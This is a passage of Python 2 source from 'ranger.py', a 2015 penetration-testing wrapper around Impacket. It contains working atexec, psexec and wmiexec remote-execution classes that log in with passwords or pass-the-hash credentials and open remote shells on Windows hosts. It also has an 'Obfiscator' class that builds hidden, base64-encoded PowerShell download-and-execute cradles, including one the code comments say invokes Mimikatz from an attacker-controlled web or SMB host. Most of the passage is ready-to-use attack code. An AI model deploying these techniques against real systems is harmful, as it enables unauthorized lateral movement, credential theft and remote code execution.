scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
print self.__outputBuffer
self.__outputBuffer = ''
'''
IMPACKET ATEXEC
'''
class ATSVC_EXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\atsvc]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\atsvc]', 445),
}
def __init__(self, username = '', password = '', domain = '', hashes = None, command = None, proto = None):
self.__username = username
self.__password = password
self.__protocols = ATSVC_EXEC.KNOWN_PROTOCOLS.keys()
self.__proto = proto
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__command = command
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def play(self, addr):
# Try all requested protocols until one works.
entries = []
if "139/SMB" in self.__proto:
protodef = (r'ncacn_np:%s[\pipe\atsvc]', 139)
port = protodef[1]
protocol = self.__proto
self.atexec_run(protocol, addr, port, protodef)
elif "445/SMB" in self.__proto:
protodef = (r'ncacn_np:%s[\pipe\atsvc]', 445)
port = protodef[1]
protocol = self.__proto
self.atexec_run(protocol, addr, port, protodef)
else:
for protocol in self.__protocols:
protodef = ATSVC_EXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s..." % protocol)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
try:
self.doStuff(rpctransport)
except Exception, e:
logging.error(e)
else:
# Got a response. No need for further iterations.
break
def atexec_run(self, protocol, addr, port, protodef):
logging.info("Trying protocol %s..." % protocol)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
try:
self.doStuff(rpctransport)
except Exception, e:
logging.error(e)
else:
# Got a response. No need for further iterations.
sys.exit("[-] Nothing left to process")
def doStuff(self, rpctransport):
def output_callback(data):
print data
dce = rpctransport.get_dce_rpc()
dce.set_credentials(*rpctransport.get_credentials())
dce.connect()
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
#dce.set_max_fragment_size(16)
dce.bind(atsvc.MSRPC_UUID_ATSVC)
at = atsvc.DCERPCAtSvc(dce)
tmpFileName = ''.join([random.choice(string.letters) for i in range(8)]) + '.tmp'
# Check [MS-TSCH] Section 2.3.4
atInfo = atsvc.AT_INFO()
atInfo['JobTime'] = 0
atInfo['DaysOfMonth'] = 0
atInfo['DaysOfWeek'] = 0
atInfo['Flags'] = 0
atInfo['Command'] = ndrutils.NDRUniqueStringW()
atInfo['Command']['Data'] = ('%%COMSPEC%% /C %s > %%SYSTEMROOT%%\\Temp\\%s\x00' % (self.__command, tmpFileName)).encode('utf-16le')
resp = at.NetrJobAdd(('\\\\%s'% rpctransport.get_dip()),atInfo)
jobId = resp['JobID']
#resp = at.NetrJobEnum(rpctransport.get_dip())
# Switching context to TSS
dce2 = dce.alter_ctx(atsvc.MSRPC_UUID_TSS)
# Now atsvc should use that new context
at = atsvc.DCERPCAtSvc(dce2)
resp = at.SchRpcRun('\\At%d' % jobId)
# On the first run, it takes a while the remote target to start executing the job
# so I'm setting this sleep.. I don't like sleeps.. but this is just an example
# Best way would be to check the task status before attempting to read the file
time.sleep(3)
# Switching back to the old ctx_id
at = atsvc.DCERPCAtSvc(dce)
resp = at.NetrJobDel('\\\\%s'% rpctransport.get_dip(), jobId, jobId)
smbConnection = rpctransport.get_smb_connection()
while True:
try:
smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, output_callback)
break
except Exception, e:
if str(e).find('SHARING') > 0:
time.sleep(3)
else:
raise
smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName)
dce.disconnect()
'''
IMPACKET PSEXEC
'''
class RemComMessage(Structure):
structure = (
('Command','4096s=""'),
('WorkingDir','260s=""'),
('Priority','<L=0x20'),
('ProcessID','<L=0x01'),
('Machine','260s=""'),
('NoWait','<L=0'),
)
class RemComResponse(Structure):
structure = (
('ErrorCode','<L=0'),
('ReturnCode','<L=0'),
)
RemComSTDOUT = "RemCom_stdout"
RemComSTDIN = "RemCom_stdin"
RemComSTDERR = "RemCom_stderr"
lock = Lock()
class PSEXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
}
def __init__(self, command, path, exeFile, copyFile, protocols = None,
username = '', password = '', domain = '', hashes = None, aesKey = None, doKerberos = False):
self.__username = username
self.__password = password
if protocols is None:
self.__protocols = PSEXEC.KNOWN_PROTOCOLS.keys()
else:
self.__protocols = [protocols]
self.__command = command
self.__path = path
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__exeFile = exeFile
self.__copyFile = copyFile
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr):
for protocol in self.__protocols:
protodef = PSEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s...\n" % protocol)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
#if hasattr(rpctransport,'preferred_dialect'):
# rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos)
self.doStuff(rpctransport)
def openPipe(self, s, tid, pipe, accessMask):
pipeReady = False
tries = 50
while pipeReady is False and tries > 0:
try:
s.waitNamedPipe(tid,pipe)
pipeReady = True
except:
tries -= 1
time.sleep(2)
pass
if tries == 0:
logging.critical('Pipe not ready, aborting')
raise
fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)
return fid
def doStuff(self, rpctransport):
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except Exception, e:
logging.critical(str(e))
sys.exit(1)
global dialect
dialect = rpctransport.get_smb_connection().getDialect()
try:
unInstalled = False
s = rpctransport.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if self.__exeFile is None:
installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
else:
try:
f = open(self.__exeFile)
except Exception, e:
logging.critical(str(e))
sys.exit(1)
installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f)
installService.install()
if self.__exeFile is not None:
f.close()
# Check if we need to copy a file for execution
if self.__copyFile is not None:
installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))
# And we change the command to be executed to this filename
self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command
tid = s.connectTree('IPC$')
fid_main = self.openPipe(s,tid,'\RemCom_communicaton',0x12019f)
packet = RemComMessage()
pid = os.getpid()
packet['Machine'] = ''.join([random.choice(string.letters) for i in range(4)])
if self.__path is not None:
packet['WorkingDir'] = self.__path
packet['Command'] = self.__command
packet['ProcessID'] = pid
s.writeNamedPipe(tid, fid_main, str(packet))
# Here we'll store the command we type so we don't print it back ;)
# ( I know.. globals are nasty :P )
global LastDataSent
LastDataSent = ''
# Create the pipes threads
stdin_pipe = RemoteStdInPipe(rpctransport,'\%s%s%d' % (RemComSTDIN ,packet['Machine'],packet['ProcessID']), smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare() )
stdin_pipe.start()
stdout_pipe = RemoteStdOutPipe(rpctransport,'\%s%s%d' % (RemComSTDOUT,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA )
stdout_pipe.start()
stderr_pipe = RemoteStdErrPipe(rpctransport,'\%s%s%d' % (RemComSTDERR,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA )
stderr_pipe.start()
# And we stay here till the end
ans = s.readNamedPipe(tid,fid_main,8)
if len(ans):
retCode = RemComResponse(ans)
logging.info("Process %s finished with ErrorCode: %d, ReturnCode: %d" % (self.__command, retCode['ErrorCode'], retCode['ReturnCode']))
installService.uninstall()
if self.__copyFile is not None:
# We copied a file for execution, let's remove it
s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
unInstalled = True
sys.exit(retCode['ErrorCode'])
except SystemExit:
raise
except:
if unInstalled is False:
installService.uninstall()
if self.__copyFile is not None:
s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
sys.stdout.flush()
sys.exit(1)
class Pipes(Thread):
def __init__(self, transport, pipe, permissions, share=None):
Thread.__init__(self)
self.server = 0
self.transport = transport
self.credentials = transport.get_credentials()
self.tid = 0
self.fid = 0
self.share = share
self.port = transport.get_dport()
self.pipe = pipe
self.permissions = permissions
self.daemon = True
def connectPipe(self):
try:
lock.acquire()
global dialect
#self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
if self.transport.get_kerberos() is True:
self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
else:
self.server.login(user, passwd, domain, lm, nt)
lock.release()
self.tid = self.server.connectTree('IPC$')
self.server.waitNamedPipe(self.tid, self.pipe)
self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
self.server.setTimeout(1000000)
except:
logging.error("Something wen't wrong connecting the pipes(%s), try again" % self.__class__)
class RemoteStdOutPipe(Pipes):
def __init__(self, transport, pipe, permisssions):
Pipes.__init__(self, transport, pipe, permisssions)
def run(self):
self.connectPipe()
while True:
try:
ans = self.server.readFile(self.tid,self.fid, 0, 1024)
except Exception, e:
pass
else:
try:
global LastDataSent
if ans != LastDataSent:
sys.stdout.write(ans)
sys.stdout.flush()
else:
# Don't echo what I sent, and clear it up
LastDataSent = ''
# Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,
# it will give false positives tho.. we should find a better way to handle this.
if LastDataSent > 10:
LastDataSent = ''
except:
pass
class RemoteStdErrPipe(Pipes):
def __init__(self, transport, pipe, permisssions):
Pipes.__init__(self, transport, pipe, permisssions)
def run(self):
self.connectPipe()
while True:
try:
ans = self.server.readFile(self.tid,self.fid, 0, 1024)
except Exception, e:
pass
else:
try:
sys.stderr.write(str(ans))
sys.stderr.flush()
except:
pass
class PsexecRemoteShell(cmd.Cmd):
def __init__(self, server, port, credentials, tid, fid, share, transport):
cmd.Cmd.__init__(self, False)
self.prompt = '\x08'
self.server = server
self.transferClient = None
self.tid = tid
self.fid = fid
self.credentials = credentials
self.share = share
self.port = port
self.transport = transport
self.intro = '[!] Press help for extra shell commands'
def connect_transferClient(self):
#self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
if self.transport.get_kerberos() is True:
self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
else:
self.transferClient.login(user, passwd, domain, lm, nt)
def do_help(self, line):
print """
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)
get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir
! {cmd} - executes a local shell cmd
""" % (self.share, self.share)
self.send_data('\r\n', False)
def do_shell(self, s):
os.system(s)
self.send_data('\r\n')
def do_get(self, src_path):
try:
if self.transferClient is None:
self.connect_transferClient()
import ntpath
filename = ntpath.basename(src_path)
fh = open(filename,'wb')
logging.info("Downloading %s\%s" % (self.share, src_path))
self.transferClient.getFile(self.share, src_path, fh.write)
fh.close()
except Exception, e:
logging.critical(str(e))
pass
self.send_data('\r\n')
def do_put(self, s):
try:
if self.transferClient is None:
self.connect_transferClient()
params = s.split(' ')
if len(params) > 1:
src_path = params[0]
dst_path = params[1]
elif len(params) == 1:
src_path = params[0]
dst_path = '/'
src_file = os.path.basename(src_path)
fh = open(src_path, 'rb')
f = dst_path + '/' + src_file
pathname = string.replace(f,'/','\\')
logging.info("Uploading %s to %s\%s" % (src_file, self.share, dst_path))
self.transferClient.putFile(self.share, pathname, fh.read)
fh.close()
except Exception, e:
logging.error(str(e))
pass
self.send_data('\r\n')
def do_lcd(self, s):
if s == '':
print os.getcwd()
else:
os.chdir(s)
self.send_data('\r\n')
def emptyline(self):
self.send_data('\r\n')
return
def default(self, line):
self.send_data(line+'\r\n')
def send_data(self, data, hideOutput = True):
if hideOutput is True:
global LastDataSent
LastDataSent = data
else:
LastDataSent = ''
self.server.writeFile(self.tid, self.fid, data)
class RemoteStdInPipe(Pipes):
def __init__(self, transport, pipe, permisssions, share=None):
Pipes.__init__(self, transport, pipe, permisssions, share)
def run(self):
self.connectPipe()
self.shell = PsexecRemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)
self.shell.cmdloop()
'''
IMPACKET WMIEXEC
'''
WMIEXEC_OUTPUT_FILENAME = '__'
class WMIEXEC:
def __init__(self, command = '', username = '', password = '', domain = '', hashes = None, aesKey = None, share = None, noOutput=False, doKerberos=False):
self.__command = command
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__share = share
self.__noOutput = noOutput
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr):
if self.__noOutput is False:
smbConnection = SMBConnection(addr, addr)
if self.__doKerberos is False:
smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
dialect = smbConnection.getDialect()
if dialect == SMB_DIALECT:
logging.info("SMBv1 dialect used")
elif dialect == SMB2_DIALECT_002:
logging.info("SMBv2.0 dialect used")
elif dialect == SMB2_DIALECT_21:
logging.info("SMBv2.1 dialect used")
else:
logging.info("SMBv3.0 dialect used")
else:
smbConnection = None
dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver = True, doKerberos=self.__doKerberos)
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process,_ = iWbemServices.GetObject('Win32_Process')
try:
self.shell = WmiexecRemoteShell(self.__share, win32Process, smbConnection)
if self.__command != ' ':
self.shell.onecmd(self.__command)
else:
self.shell.cmdloop()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.error(str(e))
if smbConnection is not None:
smbConnection.logoff()
dcom.disconnect()
sys.stdout.flush()
sys.exit(1)
if smbConnection is not None:
smbConnection.logoff()
dcom.disconnect()
class WmiexecRemoteShell(cmd.Cmd):
def __init__(self, share, win32Process, smbConnection):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + WMIEXEC_OUTPUT_FILENAME
self.__outputBuffer = ''
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = 'C:\\'
self.__noOutput = False
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(100000)
self.do_cd('\\')
else:
self.__noOutput = True
def do_shell(self, s):
os.system(s)
def do_help(self, line):
print """
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
put {src_file, dst_path} - uploads a local file to the dst_path (dst_path = default current directory)
get {file} - downloads pathname to the current local dir
! {cmd} - executes a local shell cmd
"""
def do_lcd(self, s):
if s == '':
print os.getcwd()
else:
os.chdir(s)
def do_get(self, src_path):
try:
import ntpath
newPath = ntpath.normpath(ntpath.join(self.__pwd, src_path))
drive, tail = ntpath.splitdrive(newPath)
filename = ntpath.basename(tail)
fh = open(filename,'wb')
logging.info("Downloading %s\\%s" % (drive, tail))
self.__transferClient.getFile(drive[:-1]+'$', tail, fh.write)
fh.close()
except Exception, e:
logging.error(str(e))
os.remove(filename)
pass
def do_put(self, s):
try:
params = s.split(' ')
if len(params) > 1:
src_path = params[0]
dst_path = params[1]
elif len(params) == 1:
src_path = params[0]
dst_path = ''
src_file = os.path.basename(src_path)
fh = open(src_path, 'rb')
dst_path = string.replace(dst_path, '/','\\')
import ntpath
pathname = ntpath.join(ntpath.join(self.__pwd,dst_path), src_file)
drive, tail = ntpath.splitdrive(pathname)
logging.info("Uploading %s to %s" % (src_file, pathname))
self.__transferClient.putFile(drive[:-1]+'$', tail, fh.read)
fh.close()
except Exception, e:
logging.critical(str(e))
pass
def do_exit(self, s):
return True
def emptyline(self):
return False
def do_cd(self, s):
self.execute_remote('cd ' + s)
if len(self.__outputBuffer.strip('\r\n')) > 0:
print self.__outputBuffer
self.__outputBuffer = ''
else:
self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s))
self.execute_remote('cd ')
self.__pwd = self.__outputBuffer.strip('\r\n')
self.prompt = self.__pwd + '>'
self.__outputBuffer = ''
def default(self, line):
# Let's try to guess if the user is trying to change drive
if len(line) == 2 and line[1] == ':':
# Execute the command and see if the drive is valid
self.execute_remote(line)
if len(self.__outputBuffer.strip('\r\n')) > 0:
# Something went wrong
print self.__outputBuffer
self.__outputBuffer = ''
else:
# Drive valid, now we should get the current path
self.__pwd = line
self.execute_remote('cd ')
self.__pwd = self.__outputBuffer.strip('\r\n')
self.prompt = self.__pwd + '>'
self.__outputBuffer = ''
else:
if line != '':
self.send_data(line)
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__noOutput is True:
self.__outputBuffer = ''
return
while True:
try:
self.__transferClient.getFile(self.__share, self.__output, output_callback)
break
except Exception, e:
if str(e).find('STATUS_SHARING_VIOLATION') >=0:
# Output not finished, let's wait
time.sleep(1)
pass
else:
#print str(e)
pass
self.__transferClient.deleteFile(self.__share, self.__output)
def execute_remote(self, data):
command = self.__shell + data
if self.__noOutput is False:
command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1'
obj = self.__win32Process.Create(command, self.__pwd, None)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
print self.__outputBuffer
self.__outputBuffer = ''
'''
Author: Christopher Duffy
Date: July 2015
Name: ranger.py
Purpose: To encode commands that execute PowerShell scripts, also provides a wrapper for
some of the impacket examples and fixes relevant functionality
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
'''
NMAP PARSER
'''
class Nmap_parser:
def __init__(self, nmap_xml, verbose=0):
self.nmap_xml = nmap_xml
self.verbose = verbose
self.hosts = {}
try:
self.run()
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def run(self):
# Parse the nmap xml file and extract hosts and place them in a dictionary
# Input: Nmap XML file and verbose flag
# Return: Dictionary of hosts [iterated number] = [hostname, address, protocol, port, service name, state]
if not self.nmap_xml:
sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
try:
tree = etree.parse(self.nmap_xml)
except:
sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
hosts={}
services=[]
hostname_list=[]
root = tree.getroot()
hostname_node = None
if self.verbose > 0:
print ("[*] Parsing the Nmap XML file: %s") % (self.nmap_xml)
for host in root.iter('host'):
hostname = "Unknown hostname"
for addresses in host.iter('address'):
hwaddress = "No MAC Address ID'd"
ipv4 = "No IPv4 Address ID'd"
addressv6 = "No IPv6 Address ID'd"
temp = addresses.get('addrtype')
if "mac" in temp:
hwaddress = addresses.get('addr')
if self.verbose > 2:
print("[*] The host was on the same broadcast domain")
if "ipv4" in temp:
address = addresses.get('addr')
if self.verbose > 2:
print("[*] The host had an IPv4 address")
if "ipv6" in temp:
addressv6 = addresses.get('addr')
if self.verbose > 2:
print("[*] The host had an IPv6 address")
try:
hostname_node = host.find('hostnames').find('hostname')
except:
if self.verbose > 1:
print ("[!] No hostname found")
if hostname_node is not None:
hostname = hostname_node.get('name')
else:
hostname = "Unknown hostname"
if self.verbose > 1:
print("[*] The hosts hostname is %s") % (str(hostname_node))
hostname_list.append(hostname)
for item in host.iter('port'):
state = item.find('state').get('state')
#if state.lower() == 'open':
service = item.find('service').get('name')
protocol = item.get('protocol')
port = item.get('portid')
services.append([hostname_list, address, protocol, port, service, hwaddress, state])
hostname_list=[]
for i in range(0, len(services)):
service = services[i]
index = len(service) - 1
hostname = str1 = ''.join(service[0])
address = service[1]
protocol = service[2]
port = service[3]
serv_name = service[4]
hwaddress = service[5]
state = service[6]
self.hosts[i] = [hostname, address, protocol, port, serv_name, hwaddress, state]
if self.verbose > 2:
print ("[+] Adding %s with an IP of %s:%s with the service %s")%(hostname,address,port,serv_name)
if self.hosts:
if self.verbose > 4:
print ("[*] Results from NMAP XML import: ")
for key, entry in self.hosts.iteritems():
print("[*] %s") % (str(entry))
if self.verbose > 0:
print ("[+] Parsed and imported unique ports %s") % (str(i+1))
else:
if self.verbose > 0:
print ("[-] No ports were discovered in the NMAP XML file")
def hosts_return(self):
# A controlled return method
# Input: None
# Returned: The processed hosts
try:
return self.hosts
except Exception as e:
print("[!] There was an error returning the data %s") % (e)
'''
TIMEOUT SIGNAL TERMINATION
'''
class Timeout():
"""Timeout class using ALARM signal."""
class Timeout(Exception):
pass
def __init__(self, sec):
self.sec = sec
def __enter__(self):
signal.signal(signal.SIGALRM, self.raise_timeout)
signal.alarm(self.sec)
def __exit__(self, *args):
signal.alarm(0) # disable alarm
def raise_timeout(self, *args):
raise Timeout.Timeout()
class TargetConverter:
def __init__(self, target):
self.target = target
self.cidr_noted = ""
self.range_value1 = ""
self.range_value2 = ""
self.ip_list = []
self.target_list = []
try:
self.run()
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def run(self):
range_true = re.search(r'-',self.target)
if "-" in self.target:
range_value1, range_value2 = self.target.split('-')
if len(range_value2) > 3:
self.range_value1 = range_value1
self.range_value2 = range_value2
self.ip_list.extend(self.range_to_list())
else:
self.range_value1 = range_value1
octet1, octet2, octet3, octet4 = self.range_value1.split('.')
self.range_value2 = octet1 + "." + octet2 + "." + octet3 + "." + range_value2
self.ip_list.extend(self.range_to_list())
elif "/" in self.target:
self.cidr_noted = self.target
self.ip_list.extend(self.cidr_to_list())
else:
self.ip_list.append(self.target)
def cidr_to_list(self):
ip_list = []
for ip in netaddr.IPNetwork(self.cidr_noted).iter_hosts():
ip_list.append(ip)
return(ip_list)
def range_to_list(self):
ip_list = []
ip_list = list(netaddr.iter_iprange(self.range_value1, self.range_value2))
return(ip_list)
def return_targets(self):
try:
for ip in self.ip_list:
self.target_list.append(str(ip))
return(self.target_list)
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
class NetviewDetails:
def __init__(self, user = None, users = None, target = None, targets = None, noloop = True, delay = '10', max_connections = '1000', domainController = None, debug = False):
self.user = user
self.users = users
self.target = target
self.targets = targets
self.noloop = noloop
self.delay = delay
self.max_connections = max_connections
self.domainController = domainController
self.debug = debug
def user(self):
return(self.user)
def users(self):
return(self.users)
def target(self):
return(self.target)
def targets(self):
return(self.targets)
def noloop(self):
return(self.noloop)
def delay(self):
return(self.delay)
def max_connections(self):
return(self.max_connections)
def domainController(self):
return(self.domainController)
def debug(self):
return(self.debug)
class Obfiscator:
def __init__(self, src_ip, src_port, payload, function, argument, execution, methods, domain_group, delivery, share_name, domain_name, local_group, dst_ip="", dst_port=""):
self.src_ip = src_ip
self.dst_ip = dst_ip
self.dst_port = dst_port
self.src_port = src_port
self.payload = payload
self.function = function
self.argument = argument
self.execution = execution
self.methods = methods
self.domain_group = domain_group
self.loacl_group = local_group
self.command = ""
self.unprotected_command = ""
self.delivery = delivery
self.share_name = share_name
self.domain_name = domain_name
try:
self.run()
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def run(self):
if "invoker" in self.execution:
# Direct invoker
self.invoker()
elif "download" in self.execution:
# Direct downloader
self.downloader()
elif "executor" in self.execution:
# Direct PowerShell execution
self.executor()
elif "domain_group" in self.execution:
# Extract Group Members
self.domain_group_members()
elif "local_group" in self.execution:
# Extract Local Group Memebers
self.local_group_members()
def packager(self, cleartext):
encoded_utf = cleartext.encode('utf-16-le')
encoded_base64 = base64.b64encode(encoded_utf)
command = "powershell.exe -nop -w hidden -exec bypass -enc %s" % (encoded_base64)
return(command)
def clearer(self, cleartext):
command = 'powershell.exe -nop -w hidden -exec bypass "' + cleartext + '"'
return(command)
def return_command(self):
try:
return(self.command, self.unprotected_command)
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def invoker(self):
# Invoke Mimikatz Directly
if self.delivery == "web":
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
if self.delivery == "smb":
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def executor(self):
# Invoke a PowerShell Script Directly
if self.delivery == "web":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function))
elif self.delivery == "smb":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def downloader(self):
# Download String Directly
text = "IEX ((new-object net.webclient).downloadstring('http://%s:%s/'))" % (str(self.src_ip), str(self.src_port))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def domain_group_members(self):
# Group Membership
if self.delivery == "web":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function))
elif self.delivery == "smb":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
def local_group_members(self):
# Local Group Membership
if self.delivery == "web":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s'); %s" % (str(self.src_ip), str(self.src_port), str(self.payload), str(self.function))
